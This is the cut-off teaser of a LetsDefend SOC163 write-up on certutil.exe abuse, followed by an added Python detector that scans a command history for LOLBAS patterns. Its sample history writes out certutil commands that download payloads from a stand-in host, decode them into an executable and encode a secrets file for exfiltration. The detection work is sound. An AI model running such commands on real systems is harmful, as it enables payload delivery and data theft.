LetsDefend: Suspicious Certutil.exe Usage - LOLBAS TTPs

LetsDefend — SOC163 WriteUp

Living Off The Land Binaries, Scripts and Libraries


EventID 113

We can kick off our investigation with the CMD history of the compromised endpoint "EricProd", which caused an…
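The writeup's own walk-through of that command history is cut off above, so the following added example (mine, not code from the original writeup or from LetsDefend) shows the kind of triage a SOC analyst runs over a recovered CMD history: flag certutil.exe invocations that match the LOLBAS-documented abuse patterns (remote file download via -urlcache/-verifyctl with -f, and -decode/-encode of payloads) and pull out any URL they reference. The history lines are constructed for illustration and are not the alert data from the page; only the host name "EricProd" comes from the writeup.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample command history for the endpoint "EricProd" (the host
# named in the writeup). These lines are illustrative, not the real alert data.
SAMPLE_HISTORY = [
    r"certutil -urlcache -split -f http://example.invalid/payload.txt C:\Users\Public\p.txt",
    r"certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.exe",
    r"certutil -verify C:\Windows\System32\kernel32.dll",   # legitimate use
    r"whoami",
    r"CERTUTIL.EXE -encode C:\Users\Public\secrets.docx C:\Users\Public\out.b64",
    r'"C:\Windows\System32\certutil.exe" -verifyctl -f -split http://example.invalid/x.bin',
]

# certutil.exe abuses documented by LOLBAS, keyed by the tag we report back.
# Each regex runs against the full command line (case-insensitive).
CERTUTIL_RULES = {
    "download": re.compile(r"-urlcache\b.*\s-f\b", re.I),          # -urlcache -split -f <url>
    "download_verifyctl": re.compile(r"-verifyctl\b.*\s-f\b", re.I),  # -verifyctl -f -split <url>
    "decode": re.compile(r"\s-decode(hex)?\b", re.I),              # base64/hex payload decode
    "encode": re.compile(r"\s-encode(hex)?\b", re.I),              # staging data for exfil
}
URL_RE = re.compile(r"https?://\S+", re.I)


@dataclass
class Hit:
    line_no: int
    command: str
    tags: List[str]
    url: Optional[str]


def is_certutil(cmd: str) -> bool:
    """True when the executable token is certutil / certutil.exe, with or without a path."""
    tokens = cmd.strip().split()
    if not tokens:
        return False
    exe = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return exe in ("certutil", "certutil.exe")


def classify_command(cmd: str) -> List[str]:
    """Return the list of LOLBAS tags a single command line matches (empty if benign)."""
    if not is_certutil(cmd):
        return []
    return [tag for tag, rx in CERTUTIL_RULES.items() if rx.search(cmd)]


def scan_history(lines) -> List[Hit]:
    """Walk a command history and collect every suspicious certutil invocation."""
    hits = []
    for line_no, cmd in enumerate(lines, start=1):
        tags = classify_command(cmd)
        if tags:
            m = URL_RE.search(cmd)
            hits.append(Hit(line_no, cmd, tags, m.group(0) if m else None))
    return hits


if __name__ == "__main__":
    for hit in scan_history(SAMPLE_HISTORY):
        print(f"line {hit.line_no}: {hit.tags} url={hit.url}\n    {hit.command}")
```

Matching on the command line alone misses a copy of certutil that the attacker has renamed; when process-creation telemetry is available (for example Sysmon Event ID 1), check the OriginalFileName field rather than the image name before applying these rules.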

Michael Koczwara

Security Researcher [RED&BLUE]
